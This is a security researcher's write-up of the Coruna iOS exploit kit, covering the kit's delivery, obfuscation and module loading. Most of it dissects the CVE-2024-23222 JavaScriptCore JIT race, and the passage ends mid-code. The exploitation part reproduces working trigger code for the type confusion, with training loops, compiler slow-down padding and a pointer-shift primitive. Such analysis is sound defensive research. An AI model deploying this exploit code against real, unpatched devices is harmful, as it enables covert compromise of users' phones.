I've had a lot of fun diving into this exploit kit in the last weeks; it really was a trip down memory lane to when I still did iOS security research as a hobby. Hanging around in voice calls and trying to figure out how each of the different stages worked was a blast, and I thought that before I forget everything, I should write it down.
If you are like me, you want to inspect every little stone as we make our way through the kit, but I also totally understand if you are here for a high-level overview. Because of this, I decided it's best to treat every subsection as standalone, which means it should be quite easy to skip any first or second level heading without losing too much context. Beyond that I also decided to make any fourth level heading collapsible and only discuss very deep technical details there, so that those can be skipped easily.
Similarly, I'm not sure how deep your level of knowledge is. Because of this, I am referencing other writeups on relevant topics in the reference section of the post.
Now enjoy :)
Google-Threat-Intelligence-Group (GTIG) and iVerify both published blog posts on an exploit kit named Coruna which supports iOS 13.0 - 17.2.1. They did not provide samples, but due to GTIG publishing a list of URLs used for the attacks and some of them still being active, I was able to obtain a capture against iOS 17.1 and based my analysis on that.
On March 3rd, GTIG and iVerify both published blog posts about a nation-state iOS exploit kit they had been tracking for a while. It was initially used by a customer of a surveillance company and then later in waterholing attacks on Ukrainian websites and Chinese gambling websites. On one of these websites attackers hosted a debug version of the kit, allowing GTIG to obtain exploit names (and probably also a lot of debug prints which I would've loved to have). Because of this they published a nice table containing all 23 exploits, with their names, purpose, CVE etc:
| Exploit type | Internal name | Targeted versions | Fixed version | CVE |
|---|---|---|---|---|
| WebContent R/W | buffout | 13 to 15.1.1 | 15.2 | CVE-2021-30952 |
| WebContent R/W | jacurutu | 15.2 to 15.5 | 15.6 | CVE-2022-48503 |
| WebContent R/W | bluebird | 15.6 to 16.1.2 | 16.2 | No CVE |
| WebContent R/W | terrorbird | 16.2 to 16.5.1 | 16.6 | CVE-2023-43000 |
| WebContent R/W | cassowary | 16.6 to 17.2.1 | 16.7.5, 17.3 | CVE-2024-23222 |
| WebContent PAC bypass | breezy | 13 to 14.x | ? | No CVE |
| WebContent PAC bypass | breezy15 | 15 to 16.2 | ? | No CVE |
| WebContent PAC bypass | seedbell | 16.3 to 16.5.1 | ? | No CVE |
| WebContent PAC bypass | seedbell_16_6 | 16.6 to 16.7.12 | ? | No CVE |
| WebContent PAC bypass | seedbell_17 | 17 to 17.2.1 | ? | No CVE |
| WebContent sandbox escape | IronLoader | 16.0 to 16.3.1 (16.4.0 for <= A12) | 15.7.8, 16.5 | CVE-2023-32409 |
| WebContent sandbox escape | NeuronLoader | 16.4.0 to 16.6.1 (A13 - A16) | 17.0 | No CVE |
| PE | Neutron | 13.X | 14.2 | CVE-2020-27932 |
| PE (infoleak) | Dynamo | 13.X | 14.2 | CVE-2020-27950 |
| PE | Pendulum | 14 to 14.4.x | 14.7 | No CVE |
| PE | Photon | 14.5 to 15.7.6 | 15.7.7, 16.5.1 | CVE-2023-32434 |
| PE | Parallax | 16.4 to 16.7 | 17.0 | CVE-2023-41974 |
| PE | Gruber | 15.2 to 17.2.1 | 16.7.6, 17.3 | No CVE |
| PPL Bypass | Quark | 13.X | 14.5 | No CVE |
| PPL Bypass | Gallium | 14.x | 15.7.8, 16.6 | CVE-2023-38606 |
| PPL Bypass | Carbone | 15.0 to 16.7.6 | 17.0 | No CVE |
| PPL Bypass | Sparrow | 17.0 to 17.3 | 16.7.6, 17.4 | CVE-2024-23225 |
| PPL Bypass | Rocket | 17.1 to 17.4 | 16.7.8, 17.5 | CVE-2024-23296 |
This is the table as GTIG has published it, there are two minor things I'm not sure about anymore: Based on the selection code it seems like buffout might've been exploitable since iOS 11 and Rocket is listed under the 17.4 security bulletin. But the exploit is bailing earlier if the iOS version is older than iOS 13 so I don't have proof that buffout is exploitable on lower ones. As we will see during the analysis of
Besides this table, very little information was published about the vulnerabilities themselves, but GTIG mentioned that they are going to publish RCAs at a later point, so once that happens I will for sure link them here. An in-depth analysis of the implant has already been done by both iVerify and GTIG, which is why I won't focus on it in this post.
When the posts were released I was very excited, mainly because there hadn't been any large publications on iOS exploitation lately, but also because the table had some entries with no CVE and not even a fixed version indicating to me that no root-cause analysis (RCA) had been done on these vulnerabilities yet. I especially was interested in the
But given that neither GTIG nor iVerify published any samples, initially looking at them myself didn't seem to be possible, but then I got word that some of the URLs listed in GTIG's post were still active and people were voluntarily infecting themselves in the hopes of a jailbreak. This is a very bad idea, and I still don't understand why GTIG published actively serving URLs, but it allowed me to obtain a sample and conduct this analysis. It will also likely enable a jailbreak on early versions of iOS 17. So I think generally speaking, I welcome GTIG sharing samples, but ideally this should happen in a controlled fashion where they can, for example, leave out the JIT loader or the initial RCE stage to not allow others to easily weaponise the kit, but still allow the exploits to be analysed and used in a jailbreak, which can then be used to do better analysis of future chains.
Thanks to Alfie I was able to obtain a raw capture against a phone running iOS 17.1. During initial analysis I thought that I'd eventually hit a wall because the exploit kit would do a Diffie-Hellman key exchange and then encrypt the next stages, but, as we will see, to my surprise this wasn't the case.
The capture had the following files in it:
377bed7460f7538f96bbad7bdc2b8294bdc54599.js
4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js
4a75f0551eba446b4fa35127024a84b71d9688d6.js
6beef463953ff422511395b79735ec990bed65f4.js
7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.js
9af53c1bb40f0328841df6149f1ef94f5336ae11.js
bef10a7c014b826e9dd645984e80baf313c1635f.js
favicon.ico
group.html
It comes from one of the Chinese gambling websites, so I have their version of the kit and their implant. The other variants of the kit might be different, but based on the background, I doubt that either deployment made large changes.
In a very interesting turn of events, around three weeks later on the 18th, GTIG, iVerify and Lookout all published blog posts about another iOS exploit kit called "DarkSword". This was found by Lookout by following the C2 infrastructure of Coruna and finding a similar looking domain on the same IP address that served another exploit kit. Based on the kit being later also leaked on GitHub I assume that others did the same. So not only did GTIG expose actively serving URLs of Coruna, but this also allowed the discovery of another kit. Because DarkSword is fully written in JavaScript and not obfuscated at all, it is a lot easier to analyze and there already are some writeups available on it (for example on the kernel vulnerability). I might still decide to do another writeup on it and link it here if I have time for it.
While DarkSword was used by the same operator as Coruna, the two kits are so different and there is so much engineering around Coruna that a developer would reuse that I don't think they were both developed by the same entity. Instead it seems like the operator sourced the kits from two different sources.
In this section I'll do a full analysis of the kit, starting with the landing page and ending with the SPTM/PPL bypass. Having only access to an iOS 17.1 capture, this analysis is limited to the exploits used in that version of the kit, so
This section covers the delivery mechanism of the exploit kit as well as the main JavaScript framework that orchestrates the exploitation, by loading different modules for the exploit stages. The modules themselves are further explored in the next sections.
The exploit kit was delivered on
The embedded JavaScript is divided into two sections: the first is doing the actual exploitation, while the second one is doing fingerprinting. It's minified and slightly obfuscated, namely there are three techniques employed:
I wasn't able to link the obfuscation patterns to a known public obfuscator (the closest I got was Metasploit's, but it seems to be a custom one).
There is nothing that can be done against the variable renaming, but for the integers and strings I decided to write a couple of regexes and then evaluate the expressions in place:
const stringRegex = /\[\d+(, ?\n?\d+)*\]\.map\((.) ?=> ?({return )?String\.fromCharCode\(\2 ?\^ ?(\d)+\)(;?})?\)\.join\(""\)/g;
const xorRegex = /\(-?(\d){3,} \^ -?(\d){3,}\)/g;
const addRegex = /\(-?(\d){3,} \+ -?(\d){3,}\)/g;
const matches = [...fileText.matchAll(stringRegex)];
for (const match of matches) {
const expr = match[0];
let replacement = '';
try {
replacement = eval(expr);
} catch (e) {
replacement = expr;
}
replacement = "\"" + replacement + "\"";
output = output.replace(expr, replacement);
}
...
After that I ran the deobfuscated minified JavaScript through
The second section only does fingerprinting, so to quickly summarise it, after 1s it will:
The first section will initialise one big object I named
The modules can be accessed via their hash, the two loaded ones are:
Based on their length, these hashes should be SHA1, but I wasn't able to find any matching string that would hash to them. As GTIG mentioned that they have a debug version of this kit, I'm wondering if hashes are generated on that version or if with that we would be able to get the real names.
The helper module contains classes to deal with numbers, as JavaScript cannot represent 64-bit integers natively. There is one class to save a 64-bit number in two 32-bit parts and then deal with inputs and outputs for JSValues, floats or BigInts and do basic math operations on it. A second class exists for converting between the different types using the well-known trick of having an ArrayBuffer being shared between different types of JS arrays and a dataview. Besides that there are functions to deal with different strings, basically converting between UTF16 and UTF8, byte arrays and doing string decompression based on LZW-like compression. There is also some glue code that mainly glues together different types of number representations. That's something I noticed with this kit in general: there are often multiple different implementations of the same logic, likely because different developer teams worked on different parts of the chains and later they had to integrate all of them together and then didn't do the proper engineering work to unify the codebase.
Outside of the large dispatcher object the main script will set a base URL for the dispatcher to fetch the modules from and a cookie, which according to the blog posts is unique per victim. The cookie gets prepended to the module's hash and then a SHA1 hash of the whole thing is calculated by a JS SHA1 implementation, ".js" is added to it and the module is fetched from the base URL.
After 10ms (presumably to have the remainder of the page loaded) the main function is invoked and upon return its return value is sent back to the server. The main function will initialise the main exploit module which allows for the following configuration:
This will then error out if it's not running in Safari or AppleWebKit and parses the iOS Version from the user agent. It seems like besides regular Safari, the exploit kit also has support for running from the iTunes Store, indicated by matching against the
Afterwards the exploit main function will error out if it's running on macOS (detected via
Once fingerprinting is done, it will select an exploit module for WebContent R/W based on the iOS version. If none can be found it will again bail (which would be the case for a device running iOS 17.3 or newer for example) and then invoke it for up to 20 tries to get R/W. In the case of this capture,
With R/W it can detect PAC by comparing the higher 32 bits of a function pointer from a
If PAC is detected, it now needs to be defeated. For this, they call a helper function which will then load a PAC bypass module based on the iOS version and invoke it to export a
With the ability to R/W and call arbitrary functions, the kit wants to load native code and execute its LPE. For this it will load a final JavaScript module (in this capture,
Generally, the design is quite interesting: they maintain JS code execution while executing native code on another thread and use an array to communicate between the two. I'll further elaborate on this in the section about the MachO loader framework.
And that's the whole chain, let's have a look at the modules in detail:
Note: This is the first JSC JIT bug I have ever looked at in depth, so details might be a bit off. I'm more than happy to incorporate any corrections and will also link to other writeups should they come out.
The bug is a weakness in the property watchpoint mechanism of JSC, that can be turned into a type confusion by racing the compiler thread against the main thread leading to
And don't worry—half of the terms in the paragraph above I also didn't understand going into this, which is why I specifically wrote the next section to explain some concepts in more detail before talking about the bug, exploitation and escalation to R/W.
In order to have a full understanding of what is going on, we have a lot of ground to cover. I'll try to summarise my whole mental model here, both to help less experienced people understand better but also to potentially uncover flaws in it from more experienced people. With this being said, the whole process is way too complex to do it justice in a single section so I highly recommend reading this very long but also very good blog post on JIT in JSC and potentially this blog post series as well, which helped me understand some of the different JIT stages better.
JavaScript is a weakly typed language, this means that the same variable can hold values of different types during runtime. For example, a variable can initially hold an integer and then later hold a string. Because of this, even simple operations like addition can have very complex implementations as they need to take into account the different variable types ("adding" two strings concatenates them for example). This makes JS execution quite slow, but with performance requirements of modern web applications there is the need to somehow go faster. To speed up execution, all modern browsers have a Just-In-Time (JIT) compiler, which takes the JS bytecode (intermediate representation of the JS code used by the interpreter) and compiles it to native machine code. Then, after compilation has finished, the browser will jump to the compiled code and execute it instead of interpreting the bytecode, which is much faster. But even that is not enough because it basically just means web developers will write more code that will cause websites to lag again, so on top of this already very complex compilation process, the JIT does a lot of optimisation work to make the code run faster, which in turn creates a lot more complexity and thereby attack surface for bugs.
As compilation itself is also a compute expensive process, the JIT will only compile "hot" code, which is code that is executed multiple times, and in JSC a function is "tiered up" through various different JITs that do more and more aggressive optimisations to have a good trade off between compilation time and time saved due to faster execution.
Besides reducing the chance of wasted work, this also allows the runtime to gather (type) information about the code in a so-called profiling phase, which can then be used to do better optimisations in the actual compilation phase, leading to yet another performance gain.
There is one more part of the type system important to understand this bug: JS objects are again a very generic type, which can be used in many different ways and based on that should have different optimisations applied to them. Because of this, in JSC all objects hold a pointer to a so-called structure, which contains a description of the object, specifically for which properties the object holds and where they are stored within it.
To make a more concrete example, if we have an object
During JIT compilation there are multiple phases, the relevant ones for us are Control Flow Analysis (CFA) and Constant Folding. During CFA the JIT turns type predictions into type proofs for example allowing an add operation to only emit the integer addition instruction, if it can prove that both operands are always integers (and will not overflow). Constant Folding is an optimisation that allows the JIT to precompute values during compilation, for example if we have
This goes beyond just simple arithmetic operations in JSC, for example if we have
JSC goes even further and tries to predict if
There are two types of watchpoints relevant for us: property replacement watchpoints and structure transition watchpoints.
Property watchpoints fire when a property of an object is changed, for example if we have
Structure transition watchpoints fire when the structure of an object changes, for example if we have
Cassowary was fixed as CVE-2024-23222 and the Apple advisory states
WebKit
Available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.
Description: A type confusion issue was addressed with improved checks.
WebKit Bugzilla: 267134
CVE-2024-23222
From that we get the Bugzilla ID
commit 64714692967ad278155fcae66c5cb0f853b3bf34
Author: Yusuke Suzuki <censored>
Date: Thu Jan 25 01:25:49 2024 -0800
[JSC] DFG constant property load should check the validity at the main thread
https://bugs.webkit.org/show_bug.cgi?id=267134
rdar://120443399
Reviewed by Mark Lam.
Consider the following case,
CheckStructure O, S1 | S3
GetByOffset O, offset
And S1 -> S2 -> S3 structure transition happens.
By changing object concurrently with the compiler, it is possible that we will constant fold the property with O + S2.
While we insert watchpoints into S1 and S3, we cannot notice the change of the property in S2.
If we change O to S3 before running code, CheckStructure passes and we can use a value loaded from O + S2.
1. If S1 and S3 transitions are both already watched by DFG / FTL, then we do not need to care about the issue.
CheckStructure ensures that O is S1 or S3. And both has watchpoints which fires when transition happens.
So, if we are transitioning from S1 to S2 while compiling, it already invalidates the code.
2. If there is only one Structure (S1), then we can keep the current optimization by checking this condition at the main thread.
CheckStructure ensures that O is S1. And this means that if the assumption is met at the main thread, then we can continue
using this code safely. To check this condition, we added DesiredObjectProperties, which records JSObject*, offset, value, and structure.
And at the end of compilation, in the main thread, we check this assumption is still met.
commit 66f60deae730514621d3f9c5e620aaa76e03f8f8
Author: Yusuke Suzuki <censored>
Date: Thu Jan 25 01:25:49 2024 -0800
[JSC] Remove DFGDesiredObjectProperties
https://bugs.webkit.org/show_bug.cgi?id=267134
rdar://120443399
Reviewed by Mark Lam.
When we limit the structure only one, there is no way to change the property without firing
property replacement watchpoint while keeping object's structure as specified. So removing DFGDesiredObjectProperties.
The change is in a function called
For this the old function first placed property replacement watchpoints on all the structures in the set, then took the cell lock on
The fix for this was to further restrict this optimisation to:
In this section we will explore the exploitation based on a deobfuscated and cleaned up version of the code.
Before we start, I want to mention that generally these exploits are developed in a closed-loop fashion, where the developer "dances" with the JIT till it gives them a desired code gen. Because of that some of the code might be a leftover from that process and might not be strictly needed for the exploit to work.
This is important to keep in mind since it means that there might not be a good rationale for every single line, but I'll still attempt to provide one.
The high-level idea of exploitation is to poison the JIT compiler's type information by having
This basically leads to the following code pattern that they build the exploit around:
let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer); // share the same buffer with i32Arr
function jitted_func() {
// do magic
// [...]
let typeConfused = obj.p1 // thanks to CFA the JIT thinks obj.p1/typeConfused is always a 64 bit float array, in reality we pass an array with object pointers
f64Arr[0] = typeConfused[1]; // because of this, this here becomes a simple store so we store the pointer as a float into the array
i32Arr[0] = i32Arr[0] + 16; // then we increment the pointer by 0x10 (i32Arr and f64Arr share the same buffer/operate on the same memory)
typeConfused[1] = f64Arr[0]; // and then we store it back, because of the type confusion this is again a simple store, but now in the original array we have a pointer to the first property of the object instead of the JSCell header
Now in order to trigger this bug
function newTarget() {} // single constructor to have both structS1 and structS3 share the same structure type
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
// at this point structS1 and structS3 have the same structure
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// now again structS1 and structS3 have the same structure, which is our "S1"
delete structS3.p2;
// this transferred structS3 to our "S2"
delete structS3.p1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
// and now it is our final "S3" structure
They then need to train the runtime to see
function toJIT(useS3) {
let obj = structS1;
if (useS3) {
obj = structS3;
(0)[0]
}
let typeConfused = obj.p1;
if (useS3) typeConfused = floatArrWProp2;
f64Arr[0] = typeConfused[1];
i32Arr[0] = i32Arr[0] + 16;
typeConfused[1] = f64Arr[0];
}
Now I'm not 100% sure why this exact construct is needed, but I can tell you that
The original exploit also had
There is one more caveat to this: after CFA the compiler will also have the constant folding pass, which will again call
Putting it all together, invocation of the function looks like this:
const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
if (jitIterCnt > jitIterTrain) {
toJIT(false,true); // forcing compilation
}else{
toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096); // training
}
if (jitIterCnt == jitIterTrain) {delete structS1.p2;} // triggering structure transition to S2
}
// and then modify p1 outside of S1/S3 to avoid watchpoints
delete structS1.p1;
structS1.p1 = fakeFloatArr;
structS1.p2 = 1;
// structS1 is now S3 (to bypass the runtime check)
toJIT(false, false); // trigger
Where the second parameter is a fast path to completely skip execution in the function presumably to not disturb the type information.
let victimObj = {prop1: 1, prop2: 2};
let fakeFloatArr = [1.1, victimObj];
And when the bug successfully triggers,
On its own this will have a very hard time triggering the bug as the race window between the two compiler phases is very hard to hit from JS. Because of this the exploit pads the function around the important code with dummy code to slow down the compilation process and with that basically gives it an ~80% hit rate on my machine. The dummy code is just a simple loop that isn't easy to optimise out:
One more thing the exploit does I don't have an explanation for is triggering an Eden GC right after the JIT code is generated:
for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37);
I think it might serve two purposes:
But the bug can be triggered without it.
In order to confirm the bug I used
While doing so I saw that in the unsuccessful case we constant fold the value of
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move $0x101031390, %x0 ; folded constant
Air Move (%x0), %x0
Air Move32 -8(%x0), %x1
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x1, $1, $0x101031388
Air MoveDouble 8(%x0), %q0
[...]
Because of this I got the idea that
I decided to confirm that with lldb by setting a breakpoint on
To now fully confirm the theory that the reason of different code gen is that function I used this breakpoint:
(lldb) break set -n tryGetConstantProperty
(lldb) break command add
> bt
> break set -o -a $lr -C "reg read x0" -C "c"
> c
> DONE
(lldb) c
Leading to the following output (filtered by "x0 ="):
x0 = 0x0000000101031388 x0 = 0x0000000101031388
x0 = 0x0000000101031388 x0 = 0x0000000101031388
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000101031388 x0 = 0x0000000101031388 <--- [0]
x0 = 0x0000000000000000 x0 = 0x0000000101031388 <--- [1] difference
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000 x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
x0 = 0x0000000000000000
And indeed looking at the backtraces
A successfully type confused version generates the following air assembly:
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move 8(%tmp20), %tmp37 ; load structS1 butterfly
Air Move -16(%tmp37), %tmp25 ; load p1 from butterfly
; v-- bail on bad cell tag
Air Patch &BranchTest64(3,SameAsRep)1, NonZero, %tmp25, 0xfffe000000000002, %tmp25, %tmp25
Air Move 8(%tmp25), %tmp24 ; get p1 butterfly
Air Move32 -8(%tmp24), %tmp34 ; load publicLength from butterfly
Air Move $1, %tmp35 ; [1] index
; v-- bounds check
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %tmp34, $1, %tmp25
Air MoveDouble 8(%tmp24), %ftmp1 ; raw double load from butterfly[1]
Air BB#8: ; frequency = 1.000000
Air Predecessors: #6, #7
Air Move 8(%x2), %x0 ; load obj butterfly
Air Move -16(%x0), %x1 ; load p1 from butterfly
Air Patch &Patchpoint0, $0x1034f4150 ; ???
Air Move $0xfffe000000000002, %x0 ; get expected cell tag
Air Patch &BranchTest64(3,SameAsRep)1, NonZero, %x1, %x0, %x1, %x1 ; bail on bad cell tag
Air Move 8(%x1), %x0 ; get typeConfused butterfly
Air Move32 -8(%x0), %x2 ; load publicLength from butterfly
Air Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x2, $1, %x1 ; bounds check
Air MoveDouble 8(%x0), %q0 ; typeConfused[1] load as double
Air Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %x1 ; ???
Air Move $0x780e0000b0, %x2 ; f64Arr backend
Air MoveDouble %q0, (%x2) ; store typeConfused[1] into f64Arr[0]
Air Patch &Patchpoint0, $0x10206e488 ; ???
Air Patch &Patchpoint0, $0x10206e3c8 ; ???
Air Move32 (%x2), %x4 ; load i32Arr[0] as int
Air Move $65536, %x3 ; increment for pointer shift
Air AddLeftShift64 %x3, %x4, $12, %x3
Air Rshift64 %x3, $12, %x3
Air Move32 %x3, (%x2) ; store back incremented pointer into i32Arr[0]
Air Patch &Patchpoint0, $0x10206e3c8 ; ???
Air MoveDouble (%x2), %q0 ; load incremented pointer as double
Air Patch &Patchpoint0, $0x10206e488 ; ???
Air Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %q0, %x1, %q0 ; ???
Air MoveDouble %q0, 8(%x0) ; store incremented pointer back into typeConfused[1]
Air Move $10, %x0
Air Ret64 %x0
Another thing that helped me was looking at the structure IDs of all of the variables. For this we can download a vulnerable version of JSC and then use
After creation
Object: 0x1064f4150 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
Object: 0x1064f4160 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
After p1/p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
After structS3.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43216
After structS3.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43328
After structS3.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43440
After structS3.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43552
After structS1.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43216
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180]), StructureID: 43328
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43440
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
let victimObj = {prop1: 1, prop2: 2}; // the exploit will in the end end up with a corrupted pointer on this object so that instead of pointing to the object header it points to prop1&prop2 allowing us to forge an obj
let fakeFloatArr = [1.1, victimObj];
let floatArrWProp1 = [1.1, 1.1];
floatArrWProp1.prop = 1.1;
let floatArrWProp2 = [1.1, 2.2];
floatArrWProp2.prop = 1.1;
function newTarget() {}
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
//print("After creation"); print(describe(structS1)); print(describe(structS3));
// 42880/42880
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
//print("After p1/p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43104
delete structS3.p2;
// print("After structS3.p2 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43216
delete structS3.p1;
// print("After structS3.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43328
structS3.p1 = 0x1337;
// print("After structS3.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43440
structS3.p2 = 0x1337;
// print("After structS3.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43552
let compilerSlowDownObj = {}; // {guard_p1: 1}; // {guard_p1: 1,p1: [1.1, 2.2]};
// arrays to do the confusion with
let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer);
function toJIT(useS3, skipEverything) {
// this is there so that the JIT will never see obj becoming struct type 2 (which could happen after the delete)
if (skipEverything) {return;}
let obj = structS1;
if (useS3) {
obj = structS3;
// JIT barrier - this can have side effects so the JIT has to forget type of obj
(0)[0]
}
// slow down compiler
let slowdownLoopCnt = 0;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
